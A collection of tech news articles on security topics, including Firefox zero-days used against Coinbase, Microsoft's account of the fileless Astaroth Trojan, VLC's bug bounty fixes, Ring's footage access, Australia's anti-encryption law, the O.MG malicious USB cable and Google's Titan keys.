Tech News - Security

Earlier this week, Mozilla fixed a zero-day vulnerability that was being actively exploited by attackers. It released another security update yesterday when the Coinbase Security team detected a second zero-day vulnerability in Firefox. This update has landed in Firefox 67.0.4 and Firefox ESR 60.7.2. The two zero-day vulnerabilities The first one was a type confusion vulnerability tracked as CVE-2019-11707 that occurs “when manipulating JavaScript objects due to issues in Array.pop. This can allow for an exploitable crash.” It enables an attacker to run malicious code inside Firefox’s native process. This vulnerability was reported by both Coinbase Security team and Samuel Groß, a security researcher with Google Project Zero security team. Groß has reported the vulnerability on Bugzilla back in April 15th. https://twitter.com/5aelo/status/1141273394723414016 Sharing the implications of the vulnerability, the tech researcher said, “the bug can be exploited for RCE [remote code execution] but would then need a separate sandbox escape to run code on an underlying operating system. However, most likely it can also be exploited for UXSS [universal cross-site scripting] which might be enough depending on the attacker’s goals.” The second zero-day vulnerability was described as “sandbox escape using Prompt:Open” and is assigned CVE-2019-11708. This highly-critical vulnerability enables the escape of malware from the Firefox protected process and its execution on the targeted host. “Insufficient vetting of parameters passed with the Prompt:Open IPC message between child and parent processes can result in the non-sandboxed parent process opening web content chosen by a compromised child process,” the advisory page reads. The Coinbase attack Not much detail was out about these attacks and vulnerabilities until yesterday when Martin Phil, Chief Information Security Officer at Coinbase, and his team detected an attack targeting Coinbase employees. Coinbase also said that the attacker might have targeted other cryptocurrency organizations as well. It is now notifying the organizations that it believes have been possibly targeted. https://twitter.com/SecurityGuyPhil/status/1141466335592869888 Fortunately, the attack was detected before it was able to do any damage. If it had been left undetected, the attacker could have gained access to the Coinbase backend network and stole funds from exchanges. Phil in his tweets also shared a couple of Indicators of Compromise (IOC) that will give the indication whether a system is affected or not. https://twitter.com/SecurityGuyPhil/status/1141466339518767104 Vitali Kremez who specializes in Information Security, Malware Hunting & Carding, Cybercrime Intelligence, speculated that these IOCs were linked to a username “powercat”. https://twitter.com/VK_Intel/status/1141540229951709184 Going by the IOCs, we can say that the attacker would have sent a spear-phishing email to lure victims to a web page. So, if the victims were using a vulnerable Firefox version, the web page would have downloaded and installed the malware on their systems. The macOS backdoor attack Not only cryptocurrency organizations, it looks like the attacker has also targeted other Firefox users as well. Yesterday, Patrick Wardle, a macOS security expert published an analysis of a Mac malware. This malware was sent by a user who claimed that it was installed in his fully updated Mac through Firefox’s zero-day vulnerability. Here’s how the email sent by the attacker to this user looked like: Source: Objective-See The malware that was installed on the user’s system was called Finder.app, the hash of which completely matched with one of the hashes provided by Martin. This news sparked a discussion on Hacker News. Many users found it unsettling that Mozilla took two months to deliver the security patch to fix a very crucial bug report. “Really, that Mozilla would let a reported RCE vulnerability simmer for two months until it bit someone would seem to reflect very poorly on their priorities and competence,” a user commented. Others were rather interested to know how Coinbase discovered this attack. A user commented, “I am more interested in how Coinbase employees discovered the attack. I am assuming nobody clicked the suspicious link and instead took it to a vm for reversing and analysis. It would have been game over if the exploit was actually executed on a non-sandboxed machine.” Mozilla releases Firefox 67.0.3 and Firefox ESR 60.7.1 to fix a zero-day vulnerability, being abused in the wild Firefox releases v66.0.4 and 60.6.2 to fix the expired certificate problem that ended up disabling add-ons Firefox 67 enables AV1 video decoder ‘dav1d’, by default on all desktop platforms

Last week, the President of the VideoLan non-profit organization, Jean-Baptiste Kempf, released the VLC 3.0.7, a minor update of VLC branch 3.0.x. This release is termed as ‘special’ by Kempf, as it has more security issues fixed than any other version of VLC. Kempf has said that “This high number of security issues is due to the sponsoring of a bug bounty program funded by the European Commission, during the FOSSA program.” Last year, the European Commission had announced that they will support Bug Hunting for 14 open source projects it uses. As VLC Media Player was one of the products they used, they were sponsored by EU-FOSSA. In a statement to Bleeping Computers, Kempf has stated that they had “no money”, for having the bug bounty previously. He also added that, the EU-FOSS sponsorship program provided more "manpower" towards funding and fixing security bugs in the VLC 3.0.7. According to the blogpost, VLC Media Player 3.0.7 have fixed 33 valid security issues, with 2 being high security issues, 21 being medium security issues and 10 being low security issues. Out of the two high security issues, one was an out-of-bound write issue, in the the faad2 library, which is a dependency of VLC and the other is a stack buffer overflow, in the RIST Module of VLC 4.0. The medium security issues include mostly out-of-band reads, heap overflows, NULL-dereference and use-after-free security issues. The low security issues are mostly integer overflow, division by zero, and other out-of-band reads. Kempf has also mentioned in the blogpost, that the best hacker via their bug bounty program was ele7enxxh. Bleeping Computers reports that ele7enxxh has addressed total of 13 bugs for $13,265.02. Users are quite happy with this release, due to the huge security fixes and improvements in the VLC 3.0.7 version. https://twitter.com/evanderburg/status/1136600143707246592 https://twitter.com/alorandi/status/1137603867120734208 The VLC users can download the latest version from the VideoLan website. VLC’s updating mechanism still uses HTTP over HTTPS dav1d 0.1.0, the AV1 decoder by VideoLAN, is here NSA warns users of BlueKeep vulnerability; urges them to update their Windows systems

According to a report by The Intercept, Ring, Amazon’s smart doorbell company gave access to its employees to watch live footage from cameras of the customers. As per the claim, Ring engineers and executives were allowed to watch the unfiltered footage of the users. Last year in February, Amazon acquired Ring for $1 billion. Amazon had been in the news last year for its data breach where the company leaked out the customers’ email addresses. Ring markets its cameras, mounted as doorbells as a security means that act like a privatized neighborhood watch while the user was away. The staff at Ring was able to gain access to the cameras inside as well as outside the home, depending on where the devices were positioned. Ring has been accused of mishandling videos collected by the smart device and failing to protect the footage with encryption. The Ring customer’s email address is enough to get access to cameras from user’s home. According to The Information and The Intercept, Ring’s video annotation team would watch camera footage and tag objects, humans and other things in the video clips so that its object recognition software could better itself. In 2016, Ring provided its Ukraine-based research and development team unfettered access to a folder on Amazon’s S3 cloud storage service that had unencrypted videos created by Ring cameras. Ring’s Neighbors app, that lets users receive real-time crime and safety alerts, doesn’t include any mention of image or facial recognition in its description. Ring’s terms of service and its privacy policy don’t mention any details about the manual video annotation being conducted by humans. Ring tried to justify that the videos weren’t shared by the company. Ring responded to this post stating, “We take the privacy and security of our customers’ personal information extremely seriously. In order to improve our service, we view and annotate certain Ring video recordings. These recordings are sourced exclusively from publicly shared Ring videos from the Neighbors app (in accordance with our terms of service), and from a small fraction of Ring users who have provided their explicit written consent to allow us to access and utilize their videos for such purposes. Ring employees do not have access to livestreams from Ring products. We have strict policies in place for all our team members. We implement systems to restrict and audit access to information. We hold our team members to a high ethical standard and anyone in violation of our policies faces discipline, including termination and potential legal and criminal penalties. In addition, we have zero tolerance for abuse of our systems and if we find bad actors who have engaged in this behavior, we will take swift action against them.” https://twitter.com/briankrebs/status/1065219981833617408 Because of the privacy concerns, users are now skeptical about using Ring’s smart doorbell. One comment on HackerNews read, “The ring doorbell is installed at your front door. It records pretty much all movement to and from your house. It records audio at the doorstep, so if you're having a conversation with anyone at your doorstep, that gets recorded too.” Another user commented, “If some rando gets my ring doorbell footage and figures out where I live, that's hard to undo. If someone steals my stuff and gets away with it because I didn't have a ring doorbell, that's annoying but much easier to recover from. We are talking about the difference between an insurance claim and moving house.” According to a few users, this device is prone to DDOS attacks. One of the users commented, “Aside from the 700 person team given access to live video feeds and customer databases, the lack of proper security of this product makes it a PRIME target for DDOS attacks that could cripple infrastructure.” But few users are in the favor of such devices as they find them safe and convenient to use. One user commented, “These devices are extremely popular in my neighborhood, and cost/convenience is the only thing keeping them from being universal.” Another user commented, “I'd say, yes. I've been able to watch that many people see the ring (they see the camera), and they back right off the porch. It's been awesome in this respect, people simply ring it less.” Some users believe such surveillance devices shouldn’t use cloud but instead have data stored locally. Others are now looking out for alternatives like Xiaomi Dafang camera, RCA doorbell camera, and Blue Iris. This news surely makes one reflect on how home appliances could get monitored by companies or hackers and personal data might get misused. Note: We have edited this news to include the response from the Ring team to our post. AWS introduces Amazon DocumentDB featuring compatibility with MongoDB, scalability and much more Amazon confirms plan to sell a HIPAA eligible software, Amazon Comprehend Medical, which will mine medical records of the patients US government privately advised by top Amazon executive on web portal worth billions to the Amazon; The Guardian reports

Yesterday, the Microsoft Defender Advanced Threat Protection (ATP) Research Team shared details of a fileless malware campaign through which attackers were dropping Astaroth Trojan into the memory of infected computers. https://twitter.com/MsftSecIntel/status/1148262969710698498 Astaroth is a malware known for abusing living-off-the-land binaries (LOLbins) such as Windows Management Instrumentation Command-line (WMIC) to steal sensitive information including credentials, keystrokes, and other data. It sends stolen data to a remote attacker, who can misuse them to carry out financial theft or sell victim information in the cybercriminal underground. This trojan has been public since 2017 and has affected a few European and Brazilian companies. As of now, Microsoft has not disclosed whether any other user’s machine was compromised. What are fileless threats? Fileless malware attacks either run the payload directly in the memory or use already installed applications to carry out the attack. As these attacks use legitimate programs, they are very difficult to detect for most security programs and even for experienced security analysts. Andrea Lelli, a member of Microsoft Defender ATP Research Team, thinks that though these attacks are difficult to detect, they are certainly not undetectable. “There’s no such thing as the perfect cybercrime: even fileless malware leaves a long trail of evidence that advanced detection technologies in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) can detect and stop,” he wrote in the blog post. How is the Astaroth Trojan attack implemented? During a standard review, Lelli observed that telemetry was showing a sudden increase in the use of WMIC tool to run a script. This made him suspicious of a fileless attack. Upon further investigation, he realized that the campaign was trying to run Astaroth backdoor directly into the memory. Here’s how the initial access and execution takes place using only system tools: Source: Microsoft The attack begins with a spear-phishing email containing a malicious link that redirects a user to an LNK file. When the user double-clicks on the LNK file, it triggers the execution of the WMIC tool with the “/Format” parameter. This allows the download and execution of a JavaScript code that in turn downloads payloads by abusing the Bitsadmin tool. The downloaded payloads are Base64-encoded and are decoded using the Certutil tool. While others remain encrypted, two of them are decoded to plain DLL files. The Regsvr32 tool loads one of the decoded DLLs, which then decrypts and loads other files until the Astaroth, the final payload is injected into the Userinit process. How does Microsoft Defender ATP detect and stop these attacks? Microsoft Defender ATP comes with several advanced technologies to “spot and stop a wide range of attacks.” It leverages protection capabilities from the cloud including metadata-based ML engine, behavior-based ML engine, AMSI-paired ML engine, file classification engine, among others. On the client-side, it includes protection techniques such as memory scanning engine, emulation engine, network engine, and more. Here’s a diagram depicting all the protection technologies Microsoft Defender ATP comes with: Source: Microsoft Check out the official post by Microsoft Defender ATP Research to know more in detail. Microsoft is seeking membership to Linux-distros mailing list for early access to security vulnerabilities 12 Visual Studio Code extensions that Node.js developers will love [Sponsored by Microsoft] 5 reasons Node.js developers might actually love using Azure [Sponsored by Microsoft]

Today, the team at Elastic announced that the core security features of the Elastic Stack are now free. They also announced about releasing Elastic Stack versions 6.8.0 and 7.1.0 and the alpha release of Elastic Cloud on Kubernetestoday. With the free core security features, users can now define roles that protect index and cluster level access, encrypt network traffic, create and manage users, and fully secure Kibana with Spaces. The team had opened the code for these features last year and has finally made them free today which means the users can now run a fully secure cluster. https://twitter.com/heipei/status/1130573619896225792 Release of Elastic Stack versions 6.8.0 and 7.1.0 The team also made an announcement about releasing versions 6.8.0 and 7.1.0 of the Elastic Stack, today. These versions do not contain new features but they make the core security features free in the default distribution of the Elastic Stack. The core security features include TLS for encrypted communications, file and native realm to create and manage users, and role-based access control to control user access to cluster APIs and indexes. The features also include allowing multi-tenancy for Kibana with security for Kibana Spaces. Previously, these core security features required a paid gold subscription, however, now, they are free as a part of the basic tier. Alpha release of Elastic Cloud on Kubernetes The team has also announced the alpha release of Elastic Cloud on Kubernetes (ECK) which is the official Kubernetes Operator for Elasticsearch and Kibana. It is a new product based on the Kubernetes Operator pattern that lets users manage, provision, and operate Elasticsearch clusters on Kubernetes. It is designed for automating and simplifying how Elasticsearch is deployed and operated in Kubernetes. It also provides an official way for orchestrating Elasticsearch on Kubernetes and provides a SaaS-like experience for Elastic products and solutions on Kubernetes. The team has moved the core security features into the default distribution of Elastic Stack to ensure that all clusters launched and managed by ECK are secured by default at creation time. The clusters that are deployed via ECK include free features and tier capabilities such as Kibana Spaces, frozen indices for dense storage, Canvas, Elastic Maps, and more. Users can now monitor Kubernetes logs and infrastructure with the help of Elastic Logs and Elastic Infrastructure apps. Few users think that security shouldn’t be an added feature, it should be inbuilt. A user commented on HackerNews, “Security shouldn't be treated as a bonus feature.” Another user commented, “Security should almost always be a baseline requirement before something goes up for public sale.” Few others are happy about this news. A user commented, “I know it's hard to make a buck with an open source business model but deciding to charge more for security-related features is always so frustrating to me. It leads to a culture of insecure deployments in environments when the business is trying to save money. Differentiate on storage or number of cores or something, anything but auth/security. I'm glad they've finally reversed this.” To know more about this news, check out the blog post by Elastic. Elasticsearch 7.0 rc1 releases with new allocation and security features Elastic Stack 6.7 releases with Elastic Maps, Elastic Update and much more! AWS announces Open Distro for Elasticsearch licensed under Apache 2.0  

As per a recent report by Naked Security, Google is planning to remove XSS Auditor from its Chrome web browser which is its built-in function designed for detecting cross-site scripting (XSS) vulnerabilities.  Usually, an attacker injects their own code onto a legitimate website while performing the XSS attack. The attackers either adds the malicious code to a legitimate URL or they post content to a site that stores and displays what they’ve posted (persistent XSS). And if someone looks at the code injected by the attacker it would execute a command in their browser which can then result in stealing the victim’s cookies for infecting them with a virus. XSS Auditor uses a blocklist for identifying suspicious characters or HTML tags in request parameters and match them with content for spotting attackers that inject code into a page. Some developers have an issue with it because according to them, it doesn’t catch all XSS vulnerabilities in a site. The XSS Auditor also doesn’t spot an XSS code called bypasses which is common online. XSS Auditor has also been criticized a lot because attackers use XSS Auditors to disable the code on websites and is used for bypass techniques. Also, patching the XSS Auditor bypasses had brought issues in Chrome itself.  Google’s engineers had adapted XSS Auditor for filtering out troublesome XSS code instead of blocking access but it seems it wasn’t enough so they finally thought of taking it off. Last year, while discussing the plan to remove XSS Auditor, Google senior security engineer Eduardo Vela Nava said, “We haven’t found any evidence the XSSAuditor stops any XSS, and instead we have been experiencing difficulty explaining to developers at scale, why they should fix the bugs even when the browser says the attack was stopped. In the past 3 months we surveyed all internal XSS bugs that triggered the XSSAuditor and were able to find bypasses to all of them.” In Google Groups discussion, Google security engineer Thomas Sepez said, “Bypasses abound. It prevents some legit sites from working. Once detected, there’s nothing good to do. It introduces cross-site info leaks. Fixing all the info leaks has proven difficult.” Here, the question arises about how will the web developers check if their sites are buggy Without XSS Auditor. A feature that could act as a replacement to XSS Auditor is in development, it is basically an application programming interface (API) known as Trusted Types. It also treats user input as untrustworthy by default and further forces developers to take steps to sanitise it before it could be included in a web page. A user commented on HackerNews, “I'm working on the Trusted Types project in Google. To clarify, Trusted Types are not a replacement for XSS auditor. They are both related to XSS, but are fundamentally different and even target different flavors of XSS.”  According to a few users, the XSS Auditor was not that useful. Another comment reads, “Whilst the XSS auditor was able to protect against quite a wide range of payloads for reflected vulns, I think it caused more harm than good.” Google Cloud and Nvidia Tesla set new AI training records with MLPerf benchmark results Google’s language experts are listening to some recordings from its AI assistant Google Project Zero reveals an iMessage bug that bricks iPhone causing repetitive crash and respawn operations  

The Lerna team has taken a strong stand against the U.S. Immigration and Customs Enforcement ( ICE ) by modifying their MIT license to ban companies who have collaborated with ICE from using Lerna. Lerna is a tool for managing large-scale JavaScript projects with multiple packages. Lerna lets you add dependencies to multiple packages with a single command. It made monorepos available to everyone, which were earlier very expensive and used only by big companies. A comment on Github by a Lerna developer, Jamie Kyle earlier this day, stated how he has been deeply disturbed by ICE’s behavior with American immigrants, especially with the way ICE has acted with immigrant children and wants it to stop. “The actions of ICE have had a lifelong lasting impact on these children, and many of them won't even remember it happening. I have trouble expressing how angry this makes me feel. And the worst part is that I feel helpless to improve the situation. There is one thing I have control over, and that's open source”, reads the post. Kyle states that major tech giants such as Facebook, Uber, Google, Amazon, etc, carry out “a lot of shady things behind the scenes. These companies care only about the millions of dollars that ICE is paying them and are willing to ignore all the horrible things that ICE does.” Now, these companies are also using Lerna, and “it's really hard for me to sit back and ignore what these companies are doing with my code” says Kyle. Reinforcing Lerna’s ethical beliefs, the updated Lerna license bans companies that are known collaborators with US Immigration and Customs Enforcement such as Microsoft, Palantir, and Amazon, among the others from using Lerna. These companies don’t have any licensing rights and “any use of Lerna will be considered theft”. They cannot pay for a license, and if they wish to use Lerna, they need to publicly end their contracts with ICE. For everyone else, Lerna will remain MIT licensed. Public opinion about Lerna’s decision against ICE is varied: https://twitter.com/AdrienDittrick/status/1034716993323184128 https://twitter.com/sarah_federman/status/1034633564065656832 https://twitter.com/_juandjara/status/1034716644667473921 https://twitter.com/stefanpenner/status/1034687675066970112 “Now, it's not news to me that people can use open source for evil. But it's really hard for me to sit back and ignore what these companies are doing with my code. It doesn't feel like there are enough steps in between me and the horrible things ICE is doing” says Kyle. For more information, check out the official Github post. Facebook’s AI algorithm finds 20 Myanmar Military Officials guilty of spreading hate and misinformation, leads to their ban Intel faces backlash on Microcode Patches after it prohibited Benchmarking or Comparison Homebrew’s Github repo got hacked in 30 mins. How can open source projects fight supply chain attacks?  

Last week, Australia’s Assistance and Access (A&A) anti-encryption law was passed through Parliament, which allows Australian police and government the powers to issue technical notices. The Assistance and Access (A&A) law requires tech companies to help law enforcement agencies break into individuals’ encrypted data. Using secret warrants, the government can even compel a company to serve malware remotely to the target’s device. The Labor party, which planned to amend the legislation, later pulled its amendments in the Senate and the bill was passed even though it was found to be flawed by the Labour community. The Australian Human Rights Commission wrote to Parliament, “The definition of ‘acts or things’ in the Bill is so vague as to potentially permit almost limitless forms of assistance”. Several lawmakers look set to reject the bill, criticizing the government’s efforts to rush through the bill before the holiday. The anti-encryption bill has been slammed by many. Protonmail, a Swiss-based end-to-end email encryption company has also condemned the new law in their blog post and said that they will remain committed to protecting their users anywhere in the world, including in Australia. Protonmail against the Assistance and Access (A&A) law Although ProtonMail has data centers only in Switzerland and is not under Australian jurisdiction, any request for assistance from Australian agencies under the A&A law would need to pass the scrutiny of Switzerland’s criminal procedure and data protection laws. According to ProtonMail, “just because this particular law does not affect ProtonMail and ProtonVPN does not mean we are indifferent. A&A is one of the most significant attacks on digital security and privacy since the NSA’s PRISM program. But the Australian measure is more brazen, hastily forced through Parliament over the loud objections of every sector of society, from businesses to lawyers groups.” In a letter to the Parliament, the Australian Computer Society, a trade association for IT professionals, outlined several problems in the law, including: Not every company has the technical know-how to safely implement malware that won’t accidentally backdoor the entire product (particularly with IoT devices), putting the security of people’s homes and organizations at risk. Businesses can’t easily plan or budget for possible covert surveillance work with the government. A companion “explanatory document” outlines some safeguards to protect civil rights and privacy that don’t actually appear in the law itself. Once police have gained access to a suspect’s device, they could easily remove evidence from the device that could prove the person’s innocence. There would be no way to know. These are just a few of the issues, and that’s barely scratching the surface. According to ProtonMail, “the widespread use of encryption can actually further governments’ national security goals. It is critical that we strike the right balance. In our opinion, the A&A law does not do this, and in the long run, will make us all less safe.” To know more about this in detail, visit ProtonMail ‘s official blog post. The tech community also oppose the Australian bill in an open letter The Tech community also wrote an open letter titled, “You bunch of Idiots!” to Bill Shorten and the Australian Labor from the tech community. They mention, “Every tech expert agrees that the so-called "Assistance and Access Bill" will do significant damage to Australia's IT industry.” The letter highlights three key points including: The community members state that the law weakens security for users. “We do not want to deliberately build backdoors or make our products insecure. This means everyone else's data will be vulnerable. People have an expectation that we protect their personal data to the best of our ability. We cannot continue to guarantee this unless we go against the technical capability notices issued by law enforcement - which will become a criminal offence”, according to the letter. They also said, “You have made it harder for international companies to hire Australian talent, or have offices in Australia filled with Australian talent. Companies such as Amazon, Apple, Atlassian, Microsoft, Slack, Zendesk and others now have to view their Australian staff and teams as "potentially compromised". This is because law enforcement can force a person to build a backdoor and they cannot tell their bosses. They might sack them and leave Australia because of the law you just passed.” “You have also just made it almost impossible to export Australian tech services because no-one wants a potentially vulnerable system that might contain a backdoor. Who in their right mind will buy a product like that? Look at the stock price of one of Australia's largest tech companies, Atlassian. It's down because of what you have voted for. In addition, because it violates the EU's General Data Protection Regulations (GDPR), you have just locked Australian companies and startups out of a huge market.” The tech communities strongly opposed the bill calling it a destructive and short-sighted law. They said, “In all good conscience, we can no longer support Labor. We will be advocating for people to choose those who protect digital rights.” The ‘blackout’ move on GitHub to block Australia for everyone’s safety Many Australian users suggested that the world block Australia for everyone’s safety, after the Australian Assistance and Access Bill was passed. Following this, users have created a repository on GitHub to provide easy-to-use solutions to blackout Australia, in solidarity with Australians who oppose the Assistance and Access Bill. Under the GNU/Linux OSes, the goal of the main script shall be to periodically download a blocklist and update rules in a dedicated BLACKOUT chain in iptables. The repo also includes scripts to: setup a dedicated BLACKOUT chain in the iptables filter table, and setup a privileged cron job for updating the iptable rules stop any running cron job, remove the cron job, and tear down the dedicated BLACKOUT chain. Australia’s ACCC publishes a preliminary report recommending Google Facebook be regulated and monitored for discriminatory and anti-competitive behavior Australia’s Facial recognition and identity system can have “chilling effect on freedoms of political discussion, the right to protest and the right to dissent”: The Guardian report Dark Web Phishing Kits: Cheap, plentiful and ready to trick you

While our phones are running low on battery, we do not think twice before inserting a USB to charge it. Also, while transferring files to and fro other devices, we consider the simple wire as benign. Recently, in a demonstration at DefCon 27, a hacker by the online handle MG infected a simple iPhone USB lightning cable with “a small Wi-Fi-enabled implant, which, when plugged into a computer, lets a nearby hacker run commands as if they were sitting in front of the screen”, TechCrunch reports. Per Motherboard, MG made these cables by hand, painstakingly modifying real Apple cables to include the implant. MG told Motherboard, "It looks like a legitimate cable and works just like one. Not even your computer will notice a difference. Until I, as an attacker, wirelessly take control of the cable.” These dummy cables named as “O.MG cables” are visually indistinguishable from the original cables. They also work similar to an original piece, allowing users to charge their devices via USB or transfer files from their iOS devices. The hacker not only showcased the infected cable at DefCon but has also put these similar cables on sale for $200. "There has been a lot of interest and support behind this project," MG says on his blog, "and lots of requests on how to acquire a cable. That's a great feeling!" Once the cable is plugged into a device, it enables an attacker to mount a wireless hijack of the computer. “Once plugged in, an attacker can remotely control the affected computer to send realistic-looking phishing pages to a victim’s screen, or remotely lock a computer screen to collect the user’s password when they log back in,” TechCrunch writes. “In the test with Motherboard, MG connected his phone to a wifi hotspot emanating out of the malicious cable in order to start messing with the target Mac itself. MG typed in the IP address of the fake cable on his own phone's browser and was presented with a list of options, such as opening a terminal on my Mac. From here, a hacker can run all sorts of tools on the victim's computer”, Motherboard’s Joseph Cox writes. On being asked how close an attacker should be plugged in device, MG said, "I’m currently seeing up to 300 feet with a smartphone when connecting directly." “A hacker could use a stronger antenna to reach further if necessary. But the cable can be configured to act as a client to a nearby wireless network. And if that wireless network has an internet connection, the distance basically becomes unlimited." he added. Now MG wants to get the cables produced as a legitimate security tool; he said the company Hak5 is onboard with making that happen. These cables would be made from scratch rather than modified Apple ones, according to Motherboard. MG said, "Apple cables are simply the most difficult to do this to, so if I can successfully implant one of these, then I can usually do it to other cables." How can one avoid getting tricked by the dummy USB lightning cables? Users should ensure they do not go by the looks of the external packaging if any random cable is simply lying around. One should also avoid accepting unsolicited chargers, USB dongles, or similar components as gifts from people they do not trust. Also, one should avoid borrowing chargers from people they do not know.   While purchasing any tech component, users should choose from legit sources online or from any physical ensured locations where the packaging hasn’t been tampered with. While out in public places, one should always ensure their devices, cables, USB dongles, and other components are nearby and secure. A user on HackerNews is infuriated over why major vendors like Windows, macOS, and Linux have not implemented these basic precautions “It's a severe discredit to the major operating system vendors that plugging in a USB stick can still compromise a system.” The user further adds, “If a USB device identifies itself as a keyboard, the system shouldn't accept its keystrokes until either that keyboard has typed the user's login password, or the user uses a different input device to authorize it. If it identifies itself as a storage device, the filesystem driver should be hardened. If it identifies itself as an obscure 90s printer with a buggy driver written in C, it should prompt the user to confirm the device type before it loads the driver.” Another user on HackerNews wondered how one could ensure the cables sold online are legitimate; he writes, “Even more frightening, people selling them as seemingly legitimate cables on Amazon? People will pay you and you get a new botnet. How many could you sell before it's discovered? How can I, as a consumer, even tell? Amazon will even allow you to sell your malcable under the Apple brand.” To know more about this news in detail, head over to Motherboard complete report.  Google Project Zero reveals six “interactionless” bugs that can affect iOS via Apple’s iMessage Google’s Project Zero reveals several serious zero-day vulnerabilities in a fully remote attack surface of the iphone Apple Card, iPhone’s new payment system, is now available for select users

Telegram is now joining the blockchain league with Telegram Open Network (TON), Telegram’s blockchain network. TON will integrate blockchain payments to 365 million users of Telegram by the end of October.  Earlier this month, Telegram released half a million lines of code for TON, new documentation, and a beta. According to Decrypt, “If TON delivers on promises of high speeds and decentralization, it’d be the largest blockchain launch in history.”  Regulators raised their voice against Facebook’s Libra  Regulators had raised their voice against Facebook's cryptocurrency, Libra and Libra’s launch has been pushed since it can lead to serious security issues. While Congress has already drafted bills to ban Libra.  Maxine Waters, chairwoman of the Committee on Financial Services said in the letter to Facebook, “It appears that these products may lend themselves to an entirely new global financial system that is based out of Switzerland and intended to rival U.S. monetary policy and the dollar.” It further reads, “This raises serious privacy, trading, national security, and monetary policy concerns for not only Facebook's over 2 billion users, but also for investors, consumers, and the broader global economy.” France is blocking Libra, according to The Independent, Bruno Le Maire, Economy and Finance Minister of France, said, “I want to be absolutely clear: In these conditions, we cannot authorize the development of Libra on European soil.” Regulators need more information on TON, hence unable to judge it Now the question arises, how will TON survive considering regulators’ strict eye. While most of the regulators haven’t added any comments on TON and few others think that more information is needed on TON. A spokesperson from the German Central Bank said, “We do not possess any specific information on TON. That's why we cannot comment on this app.”  A spokesperson from the European Data Protection Supervisor, a regulatory body on privacy said, “There is not much info indeed.” He further added, “Telegram will have to apply the GDPR; no specific TON regulation is needed here. Telegram will have to fulfill all compliance obligations.” These comments from the regulators don’t give any clarity based on TON. Mitja Goroshevsky, CTO of TON Labs pointed out that the lack of interest from regulators is because the Facebook-led Libra Association is quite different than TON. According to Mitja, Libra isn’t decentralized, whereas TON is a decentralized blockchain. Few other regulators think that TON doesn’t violate any laws but might face criticism by certain authorities who protect the financial system. According to others, TON needs to have a model designed wherein it will be responsible for controlling all the validators.  In a statement to Decrypt, Pavel Prigolovko, Vice President, Strategy, TON Labs, said, “TON has to switch from a model where all the validators are controlled by TON itself during the launch, to one where the community controls the majority of the validators.” Prigolovko further added, “This transition depends on the technical availability of the large Gram holders to become validators. There are quite a few technical challenges to become a validator, like setting up a reliable infrastructure with proper processes, scripts [and] monitoring.” TON will require to fulfill KYC details concerning user data Some of the regulators are sceptical about where will the user data get stored as Telegram hasn’t provided enough details regarding the same. As wallets will be linked, it is important to have certain clarity on where the data will be stored. TON will require the KYC details and users will have to follow the KYC regulations. Mitesh Shah, CEO of blockchain analytics company Omnia Markets Inc, said that Telegram has given little information about where and how user data is stored. “There are more users here than on any other chain, and having it stored in a proper place is one of the largest concerns.”  Goroshevsky noted, that neither Telegram nor TON would not require KYC functionality. That said, users will have to adhere to the KYC regulations of individual exchanges when buying or cashing out Grams.  Though KYC details are unique for an individual but this data can be used by the terrorists as few of them use Telegram to promote their campaigns. Users can make fake accounts and misuse the platform to hide the transfer of money.  Last month, Steven Stalinsky of Middle Eastern Media Research Institute told Decrypt about concerns that TON would be exploited by terrorists, who already use Telegram to promote violent campaigns. Even if KYC was implemented, Telegram wouldn’t be able to prevent subversive groups from using fake accounts to hide the transfer of money. On the contrary, according to Goroshevsky, since TON is a decentralized blockchain, it wouldn’t collect user data and it will be transparent. Goroshevsky said, “TON is not collecting user data hence it is not going to store it. TON is a decentralized blockchain and as any such blockchain, it will be fully open and transparent. And of course, that means all transaction details will be public, like on any other public ledger.” Considering the mixed reactions coming from regulators, it would be interesting to see if TON gets approval for its launch or faces the same fate as Facebook’s Libra. To know more about this news in detail, check out Decrypt’s post. Other interesting news in Security 10 times ethical hackers spotted a software vulnerability and averted a crisis New iPhone exploit checkm8 is unpatchable and can possibly lead to permanent jailbreak on iPhones Researchers release a study into Bug Bounty Programs and Responsible Disclosure for ethical hacking in IoT  

In July, Google had announced the Titan Security keys built with hardware chip to verify key integrity. Now they are available for purchase from the Google store. The security key looks like a dongle and provides two factor authentication which is more secure than just a username and password. These Titan keys are based on the FIDO standards which Google considers as the strongest and most phishing resistant two factor authentication method. This security key was initially made available to Google Cloud users. Now it is available to the public. How does the Google Titan key protect your account? Security keys are based on a standard public key cryptography protocol. The client registers a public key with the online service initially and during the authentication. Then for authentication, the online service asks the client to prove its ownership of the private key with a cryptographic signature. Google jointly contributed to the two factor authentication technical specifications to the FIDO Alliance and launched support for Gmail in 2014. The company has been working with Yubico and NXP to develop security keys internally from 2012. In a Google Cloud Blog post, Christiaan Brand, Product Manager, Google Cloud stated, “At Google, we have had not reported or confirmed account takeovers due to password phishing since we began requiring security keys as a second factor for our employees.” Google has engineered the firmware in the chips with security in mind. This firmware is permanently sealed in a secure hardware chip and is resilient to hardware attacks. Therefore the security factor is sealed in the chip itself during manufacture. FIDO has standardized the authentication protocol used between the client and server. This protocol is being implemented in popular operating systems like Android and Chrome and also the Chrome browser. The security keys can be used to authenticate services like Google, Dropbox, Facebook, GitHub, Salesforce, Stripe, and Twitter. Do you need it? If you have important information in your accounts or would like stronger security as an individual or for your organization, the Google Titan key is a good option. It is available for $50 in the Google store (only US for now) and includes a Bluetooth and USB key with the required connectors. For more details visit the Google Cloud Blog. Google introduces Cloud HSM beta hardware security module for crypto key security Google’s Protect your Election program: Security policies to defend against state-sponsored phishing attacks, and influence campaigns Defending Democracy Program: How Microsoft is taking steps to curb increasing cybersecurity threats to democracy

